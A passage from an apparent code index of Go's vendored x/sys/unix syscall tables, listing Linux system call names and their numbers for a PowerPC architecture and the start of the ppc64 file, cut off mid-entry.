SYS_MQ_TIMEDRECEIVE = 265 constant SYS_MQ_NOTIFY (line 273) | SYS_MQ_NOTIFY = 266 constant SYS_MQ_GETSETATTR (line 274) | SYS_MQ_GETSETATTR = 267 constant SYS_KEXEC_LOAD (line 275) | SYS_KEXEC_LOAD = 268 constant SYS_ADD_KEY (line 276) | SYS_ADD_KEY = 269 constant SYS_REQUEST_KEY (line 277) | SYS_REQUEST_KEY = 270 constant SYS_KEYCTL (line 278) | SYS_KEYCTL = 271 constant SYS_WAITID (line 279) | SYS_WAITID = 272 constant SYS_IOPRIO_SET (line 280) | SYS_IOPRIO_SET = 273 constant SYS_IOPRIO_GET (line 281) | SYS_IOPRIO_GET = 274 constant SYS_INOTIFY_INIT (line 282) | SYS_INOTIFY_INIT = 275 constant SYS_INOTIFY_ADD_WATCH (line 283) | SYS_INOTIFY_ADD_WATCH = 276 constant SYS_INOTIFY_RM_WATCH (line 284) | SYS_INOTIFY_RM_WATCH = 277 constant SYS_SPU_RUN (line 285) | SYS_SPU_RUN = 278 constant SYS_SPU_CREATE (line 286) | SYS_SPU_CREATE = 279 constant SYS_PSELECT6 (line 287) | SYS_PSELECT6 = 280 constant SYS_PPOLL (line 288) | SYS_PPOLL = 281 constant SYS_UNSHARE (line 289) | SYS_UNSHARE = 282 constant SYS_SPLICE (line 290) | SYS_SPLICE = 283 constant SYS_TEE (line 291) | SYS_TEE = 284 constant SYS_VMSPLICE (line 292) | SYS_VMSPLICE = 285 constant SYS_OPENAT (line 293) | SYS_OPENAT = 286 constant SYS_MKDIRAT (line 294) | SYS_MKDIRAT = 287 constant SYS_MKNODAT (line 295) | SYS_MKNODAT = 288 constant SYS_FCHOWNAT (line 296) | SYS_FCHOWNAT = 289 constant SYS_FUTIMESAT (line 297) | SYS_FUTIMESAT = 290 constant SYS_FSTATAT64 (line 298) | SYS_FSTATAT64 = 291 constant SYS_UNLINKAT (line 299) | SYS_UNLINKAT = 292 constant SYS_RENAMEAT (line 300) | SYS_RENAMEAT = 293 constant SYS_LINKAT (line 301) | SYS_LINKAT = 294 constant SYS_SYMLINKAT (line 302) | SYS_SYMLINKAT = 295 constant SYS_READLINKAT (line 303) | SYS_READLINKAT = 296 constant SYS_FCHMODAT (line 304) | SYS_FCHMODAT = 297 constant SYS_FACCESSAT (line 305) | SYS_FACCESSAT = 298 constant SYS_GET_ROBUST_LIST (line 306) | SYS_GET_ROBUST_LIST = 299 constant SYS_SET_ROBUST_LIST (line 307) | SYS_SET_ROBUST_LIST = 300 constant SYS_MOVE_PAGES (line 308) | SYS_MOVE_PAGES = 301 constant SYS_GETCPU (line 309) | SYS_GETCPU = 302 constant SYS_EPOLL_PWAIT (line 310) | SYS_EPOLL_PWAIT = 303 constant SYS_UTIMENSAT (line 311) | SYS_UTIMENSAT = 304 constant SYS_SIGNALFD (line 312) | SYS_SIGNALFD = 305 constant SYS_TIMERFD_CREATE (line 313) | SYS_TIMERFD_CREATE = 306 constant SYS_EVENTFD (line 314) | SYS_EVENTFD = 307 constant SYS_SYNC_FILE_RANGE2 (line 315) | SYS_SYNC_FILE_RANGE2 = 308 constant SYS_FALLOCATE (line 316) | SYS_FALLOCATE = 309 constant SYS_SUBPAGE_PROT (line 317) | SYS_SUBPAGE_PROT = 310 constant SYS_TIMERFD_SETTIME (line 318) | SYS_TIMERFD_SETTIME = 311 constant SYS_TIMERFD_GETTIME (line 319) | SYS_TIMERFD_GETTIME = 312 constant SYS_SIGNALFD4 (line 320) | SYS_SIGNALFD4 = 313 constant SYS_EVENTFD2 (line 321) | SYS_EVENTFD2 = 314 constant SYS_EPOLL_CREATE1 (line 322) | SYS_EPOLL_CREATE1 = 315 constant SYS_DUP3 (line 323) | SYS_DUP3 = 316 constant SYS_PIPE2 (line 324) | SYS_PIPE2 = 317 constant SYS_INOTIFY_INIT1 (line 325) | SYS_INOTIFY_INIT1 = 318 constant SYS_PERF_EVENT_OPEN (line 326) | SYS_PERF_EVENT_OPEN = 319 constant SYS_PREADV (line 327) | SYS_PREADV = 320 constant SYS_PWRITEV (line 328) | SYS_PWRITEV = 321 constant SYS_RT_TGSIGQUEUEINFO (line 329) | SYS_RT_TGSIGQUEUEINFO = 322 constant SYS_FANOTIFY_INIT (line 330) | SYS_FANOTIFY_INIT = 323 constant SYS_FANOTIFY_MARK (line 331) | SYS_FANOTIFY_MARK = 324 constant SYS_PRLIMIT64 (line 332) | SYS_PRLIMIT64 = 325 constant SYS_SOCKET (line 333) | SYS_SOCKET = 326 constant SYS_BIND (line 334) | SYS_BIND = 327 constant SYS_CONNECT (line 335) | SYS_CONNECT = 328 constant SYS_LISTEN (line 336) | SYS_LISTEN = 329 constant SYS_ACCEPT (line 337) | SYS_ACCEPT = 330 constant SYS_GETSOCKNAME (line 338) | SYS_GETSOCKNAME = 331 constant SYS_GETPEERNAME (line 339) | SYS_GETPEERNAME = 332 constant SYS_SOCKETPAIR (line 340) | SYS_SOCKETPAIR = 333 constant SYS_SEND (line 341) | SYS_SEND = 334 constant SYS_SENDTO (line 342) | SYS_SENDTO = 335 constant SYS_RECV (line 343) | SYS_RECV = 336 constant SYS_RECVFROM (line 344) | SYS_RECVFROM = 337 constant SYS_SHUTDOWN (line 345) | SYS_SHUTDOWN = 338 constant SYS_SETSOCKOPT (line 346) | SYS_SETSOCKOPT = 339 constant SYS_GETSOCKOPT (line 347) | SYS_GETSOCKOPT = 340 constant SYS_SENDMSG (line 348) | SYS_SENDMSG = 341 constant SYS_RECVMSG (line 349) | SYS_RECVMSG = 342 constant SYS_RECVMMSG (line 350) | SYS_RECVMMSG = 343 constant SYS_ACCEPT4 (line 351) | SYS_ACCEPT4 = 344 constant SYS_NAME_TO_HANDLE_AT (line 352) | SYS_NAME_TO_HANDLE_AT = 345 constant SYS_OPEN_BY_HANDLE_AT (line 353) | SYS_OPEN_BY_HANDLE_AT = 346 constant SYS_CLOCK_ADJTIME (line 354) | SYS_CLOCK_ADJTIME = 347 constant SYS_SYNCFS (line 355) | SYS_SYNCFS = 348 constant SYS_SENDMMSG (line 356) | SYS_SENDMMSG = 349 constant SYS_SETNS (line 357) | SYS_SETNS = 350 constant SYS_PROCESS_VM_READV (line 358) | SYS_PROCESS_VM_READV = 351 constant SYS_PROCESS_VM_WRITEV (line 359) | SYS_PROCESS_VM_WRITEV = 352 constant SYS_FINIT_MODULE (line 360) | SYS_FINIT_MODULE = 353 constant SYS_KCMP (line 361) | SYS_KCMP = 354 constant SYS_SCHED_SETATTR (line 362) | SYS_SCHED_SETATTR = 355 constant SYS_SCHED_GETATTR (line 363) | SYS_SCHED_GETATTR = 356 constant SYS_RENAMEAT2 (line 364) | SYS_RENAMEAT2 = 357 constant SYS_SECCOMP (line 365) | SYS_SECCOMP = 358 constant SYS_GETRANDOM (line 366) | SYS_GETRANDOM = 359 constant SYS_MEMFD_CREATE (line 367) | SYS_MEMFD_CREATE = 360 constant SYS_BPF (line 368) | SYS_BPF = 361 constant SYS_EXECVEAT (line 369) | SYS_EXECVEAT = 362 constant SYS_SWITCH_ENDIAN (line 370) | SYS_SWITCH_ENDIAN = 363 constant SYS_USERFAULTFD (line 371) | SYS_USERFAULTFD = 364 constant SYS_MEMBARRIER (line 372) | SYS_MEMBARRIER = 365 constant SYS_MLOCK2 (line 373) | SYS_MLOCK2 = 378 constant SYS_COPY_FILE_RANGE (line 374) | SYS_COPY_FILE_RANGE = 379 constant SYS_PREADV2 (line 375) | SYS_PREADV2 = 380 constant SYS_PWRITEV2 (line 376) | SYS_PWRITEV2 = 381 constant SYS_KEXEC_FILE_LOAD (line 377) | SYS_KEXEC_FILE_LOAD = 382 constant SYS_STATX (line 378) | SYS_STATX = 383 constant SYS_PKEY_ALLOC (line 379) | SYS_PKEY_ALLOC = 384 constant SYS_PKEY_FREE (line 380) | SYS_PKEY_FREE = 385 constant SYS_PKEY_MPROTECT (line 381) | SYS_PKEY_MPROTECT = 386 constant SYS_RSEQ (line 382) | SYS_RSEQ = 387 constant SYS_IO_PGETEVENTS (line 383) | SYS_IO_PGETEVENTS = 388 constant SYS_SEMGET (line 384) | SYS_SEMGET = 393 constant SYS_SEMCTL (line 385) | SYS_SEMCTL = 394 constant SYS_SHMGET (line 386) | SYS_SHMGET = 395 constant SYS_SHMCTL (line 387) | SYS_SHMCTL = 396 constant SYS_SHMAT (line 388) | SYS_SHMAT = 397 constant SYS_SHMDT (line 389) | SYS_SHMDT = 398 constant SYS_MSGGET (line 390) | SYS_MSGGET = 399 constant SYS_MSGSND (line 391) | SYS_MSGSND = 400 constant SYS_MSGRCV (line 392) | SYS_MSGRCV = 401 constant SYS_MSGCTL (line 393) | SYS_MSGCTL = 402 constant SYS_CLOCK_GETTIME64 (line 394) | SYS_CLOCK_GETTIME64 = 403 constant SYS_CLOCK_SETTIME64 (line 395) | SYS_CLOCK_SETTIME64 = 404 constant SYS_CLOCK_ADJTIME64 (line 396) | SYS_CLOCK_ADJTIME64 = 405 constant SYS_CLOCK_GETRES_TIME64 (line 397) | SYS_CLOCK_GETRES_TIME64 = 406 constant SYS_CLOCK_NANOSLEEP_TIME64 (line 398) | SYS_CLOCK_NANOSLEEP_TIME64 = 407 constant SYS_TIMER_GETTIME64 (line 399) | SYS_TIMER_GETTIME64 = 408 constant SYS_TIMER_SETTIME64 (line 400) | SYS_TIMER_SETTIME64 = 409 constant SYS_TIMERFD_GETTIME64 (line 401) | SYS_TIMERFD_GETTIME64 = 410 constant SYS_TIMERFD_SETTIME64 (line 402) | SYS_TIMERFD_SETTIME64 = 411 constant SYS_UTIMENSAT_TIME64 (line 403) | SYS_UTIMENSAT_TIME64 = 412 constant SYS_PSELECT6_TIME64 (line 404) | SYS_PSELECT6_TIME64 = 413 constant SYS_PPOLL_TIME64 (line 405) | SYS_PPOLL_TIME64 = 414 constant SYS_IO_PGETEVENTS_TIME64 (line 406) | SYS_IO_PGETEVENTS_TIME64 = 416 constant SYS_RECVMMSG_TIME64 (line 407) | SYS_RECVMMSG_TIME64 = 417 constant SYS_MQ_TIMEDSEND_TIME64 (line 408) | SYS_MQ_TIMEDSEND_TIME64 = 418 constant SYS_MQ_TIMEDRECEIVE_TIME64 (line 409) | SYS_MQ_TIMEDRECEIVE_TIME64 = 419 constant SYS_SEMTIMEDOP_TIME64 (line 410) | SYS_SEMTIMEDOP_TIME64 = 420 constant SYS_RT_SIGTIMEDWAIT_TIME64 (line 411) | SYS_RT_SIGTIMEDWAIT_TIME64 = 421 constant SYS_FUTEX_TIME64 (line 412) | SYS_FUTEX_TIME64 = 422 constant SYS_SCHED_RR_GET_INTERVAL_TIME64 (line 413) | SYS_SCHED_RR_GET_INTERVAL_TIME64 = 423 constant SYS_PIDFD_SEND_SIGNAL (line 414) | SYS_PIDFD_SEND_SIGNAL = 424 constant SYS_IO_URING_SETUP (line 415) | SYS_IO_URING_SETUP = 425 constant SYS_IO_URING_ENTER (line 416) | SYS_IO_URING_ENTER = 426 constant SYS_IO_URING_REGISTER (line 417) | SYS_IO_URING_REGISTER = 427 constant SYS_OPEN_TREE (line 418) | SYS_OPEN_TREE = 428 constant SYS_MOVE_MOUNT (line 419) | SYS_MOVE_MOUNT = 429 constant SYS_FSOPEN (line 420) | SYS_FSOPEN = 430 constant SYS_FSCONFIG (line 421) | SYS_FSCONFIG = 431 constant SYS_FSMOUNT (line 422) | SYS_FSMOUNT = 432 constant SYS_FSPICK (line 423) | SYS_FSPICK = 433 constant SYS_PIDFD_OPEN (line 424) | SYS_PIDFD_OPEN = 434 constant SYS_CLONE3 (line 425) | SYS_CLONE3 = 435 constant SYS_CLOSE_RANGE (line 426) | SYS_CLOSE_RANGE = 436 constant SYS_OPENAT2 (line 427) | SYS_OPENAT2 = 437 constant SYS_PIDFD_GETFD (line 428) | SYS_PIDFD_GETFD = 438 constant SYS_FACCESSAT2 (line 429) | SYS_FACCESSAT2 = 439 constant SYS_PROCESS_MADVISE (line 430) | SYS_PROCESS_MADVISE = 440 constant SYS_EPOLL_PWAIT2 (line 431) | SYS_EPOLL_PWAIT2 = 441 constant SYS_MOUNT_SETATTR (line 432) | SYS_MOUNT_SETATTR = 442 constant SYS_QUOTACTL_FD (line 433) | SYS_QUOTACTL_FD = 443 constant SYS_LANDLOCK_CREATE_RULESET (line 434) | SYS_LANDLOCK_CREATE_RULESET = 444 constant SYS_LANDLOCK_ADD_RULE (line 435) | SYS_LANDLOCK_ADD_RULE = 445 constant SYS_LANDLOCK_RESTRICT_SELF (line 436) | SYS_LANDLOCK_RESTRICT_SELF = 446 constant SYS_PROCESS_MRELEASE (line 437) | SYS_PROCESS_MRELEASE = 448 constant SYS_FUTEX_WAITV (line 438) | SYS_FUTEX_WAITV = 449 constant SYS_SET_MEMPOLICY_HOME_NODE (line 439) | SYS_SET_MEMPOLICY_HOME_NODE = 450 constant SYS_CACHESTAT (line 440) | SYS_CACHESTAT = 451 constant SYS_FCHMODAT2 (line 441) | SYS_FCHMODAT2 = 452 constant SYS_MAP_SHADOW_STACK (line 442) | SYS_MAP_SHADOW_STACK = 453 constant SYS_FUTEX_WAKE (line 443) | SYS_FUTEX_WAKE = 454 constant SYS_FUTEX_WAIT (line 444) | SYS_FUTEX_WAIT = 455 constant SYS_FUTEX_REQUEUE (line 445) | SYS_FUTEX_REQUEUE = 456 FILE: vendor/golang.org/x/sys/unix/zsysnum_linux_ppc64.go constant SYS_RESTART_SYSCALL (line 9) | SYS_RESTART_SYSCALL = 0 constant SYS_EXIT (line 10) | SYS_EXIT = 1 constant SYS_FORK (line 11) | SYS_FORK = 2 constant SYS_READ (line 12) | SYS_READ = 3 constant SYS_WRITE (line 13) | SYS_WRITE = 4 constant SYS_OPEN (line 14) | SYS_OPEN = 5 constant SYS_CLOSE (line 15) | SYS_CLOSE = 6 constant SYS_WAITPID (line 16) | SYS_WAITPID = 7 constant SYS_CREAT (line 17) | SYS_CREAT = 8 constant SYS_LINK (line 18) | SYS_LINK = 9 constant SYS_UNLINK (line 19) | SYS_UNLINK = 10 constant SYS_EXECVE (line 20) | SYS_EXECVE = 11 constant SYS_CHDIR (line 21) | SYS_CHDIR = 12 constant SYS_TIME (line 22) | SYS_TIME = 13 constant SYS_MKNOD (line 23) | SYS_MKNOD = 14 constant SYS_CHMOD (line 24) | SYS_CHMOD = 15 constant SYS_LCHOWN (line 25) | SYS_LCHOWN = 16 constant SYS_BREAK (line 26) | SYS_BREAK = 17 constant SYS_OLDSTAT (line 27) | SYS_OLDSTAT = 18 constant SYS_LSEEK (line 28) | SYS_LSEEK = 19 constant SYS_GETPID (line 29) | SYS_GETPID = 20 constant SYS_MOUNT (line 30) | SYS_MOUNT = 21 constant SYS_UMOUNT (line 31) | SYS_UMOUNT = 22 constant SYS_SETUID (line 32) | SYS_SETUID = 23 constant SYS_GETUID (line 33) | SYS_GETUID = 24 constant SYS_STIME (line 34) | SYS_STIME = 25 constant SYS_PTRACE (line 35) | SYS_PTRACE = 26 constant SYS_ALARM (line 36) | SYS_ALARM = 27 constant SYS_OLDFSTAT (line 37) | SYS_OLDFSTAT = 28 constant SYS_PAUSE (line 38) | SYS_PAUSE = 29 constant SYS_UTIME (line 39) | SYS_UTIME = 30 constant SYS_STTY (line 40) | SYS_STTY = 31 constant SYS_GTTY (line 41) | SYS_GTTY = 32 constant SYS_ACCESS (line 42) | SYS_ACCESS = 33 constant SYS_NICE (line 43) | SYS_NICE = 34 constant SYS_FTIME (line 44) | SYS_FTIME = 35 constant SYS_SYNC (line 45) | SYS_SYNC = 36 constant SYS_KILL (line 46) | SYS_KILL = 37 constant SYS_RENAME (line 47) | SYS_RENAME = 38 constant SYS_MKDIR (line 48) | SYS_MKDIR = 39 constant SYS_RMDIR (line 49) | SYS_RMDIR = 40 constant SYS_DUP (line 50) | SYS_DUP = 41 constant SYS_PIPE (line 51) | SYS_PIPE = 42 constant SYS_TIMES (line 52) | SYS_TIMES = 43 constant SYS_PROF (line 53) | SYS_PROF = 44 constant SYS_BRK (line 54) | SYS_BRK = 45 constant SYS_SETGID (line 55) | SYS_SETGID = 46 constant SYS_GETGID (line 56) | SYS_GETGID = 47 constant SYS_SIGNAL (line 57) | SYS_SIGNAL = 48 constant SYS_GETEUID (line 58) | SYS_GETEUID = 49 constant SYS_GETEGID (line 59) | SYS_GETEGID = 50 constant SYS_ACCT (line 60) | SYS_ACCT = 51 constant SYS_UMOUNT2 (line 61) | SYS_UMOUNT2 = 52 constant SYS_LOCK (line 62) | SYS_LOCK = 53 constant SYS_IOCTL (line 63) | SYS_IOCTL = 54 constant SYS_FCNTL (line 64) | SYS_FCNTL = 55 constant SYS_MPX (line 65) | SYS_MPX = 56 constant SYS_SETPGID (line 66) | SYS_SETPGID = 57 constant SYS_ULIMIT (line 67) | SYS_ULIMIT = 58 constant SYS_OLDOLDUNAME (line 68) | SYS_OLDOLDUNAME = 59 constant SYS_UMASK (line 69) | SYS_UMASK = 60 constant SYS_CHROOT (line 70) | SYS_CHROOT = 61 constant SYS_USTAT (line 71) | SYS_USTAT = 62 constant SYS_DUP2 (line 72) | SYS_DUP2 = 63 constant SYS_GETPPID (line 73) | SYS_GETPPID = 64 constant SYS_GETPGRP (line 74) | SYS_GETPGRP = 65 constant SYS_SETSID (line 75) | SYS_SETSID = 66 constant SYS_SIGACTION (line 76) | SYS_SIGACTION = 67 constant SYS_SGETMASK (line 77) | SYS_SGETMASK = 68 constant SYS_SSETMASK (line 78) | SYS_SSETMASK = 69 constant SYS_SETREUID (line 79) | SYS_SETREUID = 70 constant SYS_SETREGID (line 80) | SYS_SETREGID = 71 constant SYS_SIGSUSPEND (line 81) | SYS_SIGSUSPEND = 72 constant SYS_SIGPENDING (line 82) | SYS_SIGPENDING = 73 constant SYS_SETHOSTNAME (line 83) | SYS_SETHOSTNAME = 74 constant SYS_SETRLIMIT (line 84) | SYS_SETRLIMIT = 75 constant SYS_GETRLIMIT (line 85) | SYS_GETRLIMIT = 76 constant SYS_GETRUSAGE (line 86) | SYS_GETRUSAGE = 77 constant SYS_GETTIMEOFDAY (line 87) | SYS_GETTIMEOFDAY = 78 constant SYS_SETTIMEOFDAY (line 88) | SYS_SETTIMEOFDAY = 79 constant SYS_GETGROUPS (line 89) | SYS_GETGROUPS = 80 constant SYS_SETGROUPS (line 90) | SYS_SETGROUPS = 81 constant SYS_SELECT (line 91) | SYS_SELECT = 82 constant SYS_SYMLINK (line 92) | SYS_SYMLINK = 83 constant SYS_OLDLSTAT (line 93) | SYS_OLDLSTAT = 84 constant SYS_READLINK (line 94) | SYS_READLINK = 85 constant SYS_USELIB (line 95) | SYS_USELIB = 86 constant SYS_SWAPON (line 96) | SYS_SWAPON = 87 constant SYS_REBOOT (line 97) | SYS_REBOOT = 88 constant SYS_READDIR (line 98) | SYS_READDIR = 89 constant SYS_MMAP (line 99) | SYS_MMAP = 90 constant SYS_MUNMAP (line 100) | SYS_MUNMAP = 91 constant SYS_TRUNCATE (line 101) | SYS_TRUNCATE = 92 constant SYS_FTRUNCATE (line 102) | SYS_FTRUNCATE = 93 constant SYS_FCHMOD (line 103) | SYS_FCHMOD = 94 constant SYS_FCHOWN (line 104) | SYS_FCHOWN = 95 constant SYS_GETPRIORITY (line 105) | SYS_GETPRIORITY = 96 constant SYS_SETPRIORITY (line 106) | SYS_SETPRIORITY = 97 constant SYS_PROFIL (line 107) | SYS_PROFIL = 98 constant SYS_STATFS (line 108) | SYS_STATFS = 99 constant SYS_FSTATFS (line 109) | SYS_FSTATFS = 100 constant SYS_IOPERM (line 110) | SYS_IOPERM = 101 constant SYS_SOCKETCALL (line 111) | SYS_SOCKETCALL = 102 constant SYS_SYSLOG (line 112) | SYS_SYSLOG = 103 constant SYS_SETITIMER (line 113) | SYS_SETITIMER = 104 constant SYS_GETITIMER (line 114) | SYS_GETITIMER = 105 constant SYS_STAT (line 115) | SYS_STAT = 106 constant SYS_LSTAT (line 116) | SYS_LSTAT = 107 constant SYS_FSTAT (line 117) | SYS_FSTAT = 108 constant SYS_OLDUNAME (line 118) | SYS_OLDUNAME = 109 constant SYS_IOPL (line 119) | SYS_IOPL = 110 constant SYS_VHANGUP (line 120) | SYS_VHANGUP = 111 constant SYS_IDLE (line 121) | SYS_IDLE = 112 constant SYS_VM86 (line 122) | SYS_VM86 = 113 constant SYS_WAIT4 (line 123) | SYS_WAIT4 = 114 constant SYS_SWAPOFF (line 124) | SYS_SWAPOFF = 115 constant SYS_SYSINFO (line 125) | SYS_SYSINFO = 116 constant SYS_IPC (line 126) | SYS_IPC = 117 constant SYS_FSYNC (line 127) | SYS_FSYNC = 118 constant SYS_SIGRETURN (line 128) | SYS_SIGRETURN = 119 constant SYS_CLONE (line 129) | SYS_CLONE = 120 constant SYS_SETDOMAINNAME (line 130) | SYS_SETDOMAINNAME = 121 constant SYS_UNAME (line 131) | SYS_UNAME = 122 constant SYS_MODIFY_LDT (line 132) | SYS_MODIFY_LDT = 123 constant SYS_ADJTIMEX (line 133) | SYS_ADJTIMEX = 124 constant SYS_MPROTECT (line 134) | SYS_MPROTECT = 125 constant SYS_SIGPROCMASK (line 135) | SYS_SIGPROCMASK = 126 constant SYS_CREATE_MODULE (line 136) | SYS_CREATE_MODULE = 127 constant SYS_INIT_MODULE (line 137) | SYS_INIT_MODULE = 128 constant SYS_DELETE_MODULE (line 138) | SYS_DELETE_MODULE = 129 constant SYS_GET_KERNEL_SYMS (line 139) | SYS_GET_KERNEL_SYMS = 130 constant SYS_QUOTACTL (line 140) | SYS_QUOTACTL = 131 constant SYS_GETPGID (line 141) | SYS_GETPGID = 132 constant SYS_FCHDIR (line 142) | SYS_FCHDIR = 133 constant SYS_BDFLUSH (line 143) | SYS_BDFLUSH = 134 constant SYS_SYSFS (line 144) | SYS_SYSFS = 135 constant SYS_PERSONALITY (line 145) | SYS_PERSONALITY = 136 constant SYS_AFS_SYSCALL (line 146) | SYS_AFS_SYSCALL = 137 constant SYS_SETFSUID (line 147) | SYS_SETFSUID = 138 constant SYS_SETFSGID (line 148) | SYS_SETFSGID = 139 constant SYS__LLSEEK (line 149) | SYS__LLSEEK = 140 constant SYS_GETDENTS (line 150) | SYS_GETDENTS = 141 constant SYS__NEWSELECT (line 151) | SYS__NEWSELECT = 142 constant SYS_FLOCK (line 152) | SYS_FLOCK = 143 constant SYS_MSYNC (line 153) | SYS_MSYNC = 144 constant SYS_READV (line 154) | SYS_READV = 145 constant SYS_WRITEV (line 155) | SYS_WRITEV = 146 constant SYS_GETSID (line 156) | SYS_GETSID = 147 constant SYS_FDATASYNC (line 157) | SYS_FDATASYNC = 148 constant SYS__SYSCTL (line 158) | SYS__SYSCTL = 149 constant SYS_MLOCK (line 159) | SYS_MLOCK = 150 constant SYS_MUNLOCK (line 160) | SYS_MUNLOCK = 151 constant SYS_MLOCKALL (line 161) | SYS_MLOCKALL = 152 constant SYS_MUNLOCKALL (line 162) | SYS_MUNLOCKALL = 153 constant SYS_SCHED_SETPARAM (line 163) | SYS_SCHED_SETPARAM = 154 constant SYS_SCHED_GETPARAM (line 164) | SYS_SCHED_GETPARAM = 155 constant SYS_SCHED_SETSCHEDULER (line 165) | SYS_SCHED_SETSCHEDULER = 156 constant SYS_SCHED_GETSCHEDULER (line 166) | SYS_SCHED_GETSCHEDULER = 157 constant SYS_SCHED_YIELD (line 167) | SYS_SCHED_YIELD = 158 constant SYS_SCHED_GET_PRIORITY_MAX (line 168) | SYS_SCHED_GET_PRIORITY_MAX = 159 constant SYS_SCHED_GET_PRIORITY_MIN (line 169) | SYS_SCHED_GET_PRIORITY_MIN = 160 constant SYS_SCHED_RR_GET_INTERVAL (line 170) | SYS_SCHED_RR_GET_INTERVAL = 161 constant SYS_NANOSLEEP (line 171) | SYS_NANOSLEEP = 162 constant SYS_MREMAP (line 172) | SYS_MREMAP = 163 constant SYS_SETRESUID (line 173) | SYS_SETRESUID = 164 constant SYS_GETRESUID (line 174) | SYS_GETRESUID = 165 constant SYS_QUERY_MODULE (line 175) | SYS_QUERY_MODULE = 166 constant SYS_POLL (line 176) | SYS_POLL = 167 constant SYS_NFSSERVCTL (line 177) | SYS_NFSSERVCTL = 168 constant SYS_SETRESGID (line 178) | SYS_SETRESGID = 169 constant SYS_GETRESGID (line 179) | SYS_GETRESGID = 170 constant SYS_PRCTL (line 180) | SYS_PRCTL = 171 constant SYS_RT_SIGRETURN (line 181) | SYS_RT_SIGRETURN = 172 constant SYS_RT_SIGACTION (line 182) | SYS_RT_SIGACTION = 173 constant SYS_RT_SIGPROCMASK (line 183) | SYS_RT_SIGPROCMASK = 174 constant SYS_RT_SIGPENDING (line 184) | SYS_RT_SIGPENDING = 175 constant SYS_RT_SIGTIMEDWAIT (line 185) | SYS_RT_SIGTIMEDWAIT = 176 constant SYS_RT_SIGQUEUEINFO (line 186) | SYS_RT_SIGQUEUEINFO = 177 constant SYS_RT_SIGSUSPEND (line 187) | SYS_RT_SIGSUSPEND = 178 constant SYS_PREAD64 (line 188) | SYS_PREAD64 = 179 constant SYS_PWRITE64 (line 189) | SYS_PWRITE64 = 180 constant SYS_CHOWN (line 190) | SYS_CHOWN = 181 constant SYS_GETCWD (line 191) | SYS_GETCWD = 182 constant SYS_CAPGET (line 192) | SYS_CAPGET = 183 constant SYS_CAPSET (line 193) | SYS_CAPSET = 184 constant SYS_SIGALTSTACK (line 194) | SYS_SIGALTSTACK = 185 constant SYS_SENDFILE (line 195) | SYS_SENDFILE = 186 constant SYS_GETPMSG (line 196) | SYS_GETPMSG = 187 constant SYS_PUTPMSG (line 197) | SYS_PUTPMSG = 188 constant SYS_VFORK (line 198) | SYS_VFORK = 189 constant SYS_UGETRLIMIT (line 199) | SYS_UGETRLIMIT = 190 constant SYS_READAHEAD (line 200) | SYS_READAHEAD = 191 constant SYS_PCICONFIG_READ (line 201) | SYS_PCICONFIG_READ = 198 constant SYS_PCICONFIG_WRITE (line 202) | SYS_PCICONFIG_WRITE = 199 constant SYS_PCICONFIG_IOBASE (line 203) | SYS_PCICONFIG_IOBASE = 200 constant SYS_MULTIPLEXER (line 204) | SYS_MULTIPLEXER = 201 constant SYS_GETDENTS64 (line 205) | SYS_GETDENTS64 = 202 constant SYS_PIVOT_ROOT (line 206) | SYS_PIVOT_ROOT = 203 constant SYS_MADVISE (line 207) | SYS_MADVISE = 205 constant SYS_MINCORE (line 208) | SYS_MINCORE = 206 constant SYS_GETTID (line 209) | SYS_GETTID = 207 constant SYS_TKILL (line 210) | SYS_TKILL = 208 constant SYS_SETXATTR (line 211) | SYS_SETXATTR = 209 constant SYS_LSETXATTR (line 212) | SYS_LSETXATTR = 210 constant SYS_FSETXATTR (line 213) | SYS_FSETXATTR = 211 constant SYS_GETXATTR (line 214) | SYS_GETXATTR = 212 constant SYS_LGETXATTR (line 215) | SYS_LGETXATTR = 213 constant SYS_FGETXATTR (line 216) | SYS_FGETXATTR = 214 constant SYS_LISTXATTR (line 217) | SYS_LISTXATTR = 215 constant SYS_LLISTXATTR (line 218) | SYS_LLISTXATTR = 216 constant SYS_FLISTXATTR (line 219) | SYS_FLISTXATTR = 217 constant SYS_REMOVEXATTR (line 220) | SYS_REMOVEXATTR = 218 constant SYS_LREMOVEXATTR (line 221) | SYS_LREMOVEXATTR = 219 constant SYS_FREMOVEXATTR (line 222) | SYS_FREMOVEXATTR = 220 constant SYS_FUTEX (line 223) | SYS_FUTEX = 221 constant SYS_SCHED_SETAFFINITY (line 224) | SYS_SCHED_SETAFFINITY = 222 constant SYS_SCHED_GETAFFINITY (line 225) | SYS_SCHED_GETAFFINITY = 223 constant SYS_TUXCALL (line 226) | SYS_TUXCALL = 225 constant SYS_IO_SETUP (line 227) | SYS_IO_SETUP = 227 constant SYS_IO_DESTROY (line 228) | SYS_IO_DESTROY = 228 constant SYS_IO_GETEVENTS (line 229) | SYS_IO_GETEVENTS = 229 constant SYS_IO_SUBMIT (line 230) | SYS_IO_SUBMIT = 230 constant SYS_IO_CANCEL (line 231) | SYS_IO_CANCEL = 231 constant SYS_SET_TID_ADDRESS (line 232) | SYS_SET_TID_ADDRESS = 232 constant SYS_FADVISE64 (line 233) | SYS_FADVISE64 = 233 constant SYS_EXIT_GROUP (line 234) | SYS_EXIT_GROUP = 234 constant SYS_LOOKUP_DCOOKIE (line 235) | SYS_LOOKUP_DCOOKIE = 235 constant SYS_EPOLL_CREATE (line 236) | SYS_EPOLL_CREATE = 236 constant SYS_EPOLL_CTL (line 237) | SYS_EPOLL_CTL = 237 constant SYS_EPOLL_WAIT (line 238) | SYS_EPOLL_WAIT = 238 constant SYS_REMAP_FILE_PAGES (line 239) | SYS_REMAP_FILE_PAGES = 239 constant SYS_TIMER_CREATE (line 240) | SYS_TIMER_CREATE = 240 constant SYS_TIMER_SETTIME (line 241) | SYS_TIMER_SETTIME = 241 constant SYS_TIMER_GETTIME (line 242) | SYS_TIMER_GETTIME = 242 constant SYS_TIMER_GETOVERRUN (line 243) | SYS_TIMER_GETOVERRUN = 243 constant SYS_TIMER_DELETE (line 244) | SYS_TIMER_DELETE = 244 constant SYS_CLOCK_SETTIME (line 245) | SYS_CLOCK_SETTIME = 245 constant SYS_CLOCK_GETTIME (line 246) | SYS_CLOCK_GETTIME = 246 constant SYS_CLOCK_GETRES (line 247) | SYS_CLOCK_GETRES = 247 constant SYS_CLOCK_NANOSLEEP (line 248) | SYS_CLOCK_NANOSLEEP = 248 constant SYS_SWAPCONTEXT (line 249) | SYS_SWAPCONTEXT = 249 constant SYS_TGKILL (line 250) | SYS_TGKILL = 250 constant SYS_UTIMES (line 251) | SYS_UTIMES = 251 constant SYS_STATFS64 (line 252) | SYS_STATFS64 = 252 constant SYS_FSTATFS64 (line 253) | SYS_FSTATFS64 = 253 constant SYS_RTAS (line 254) | 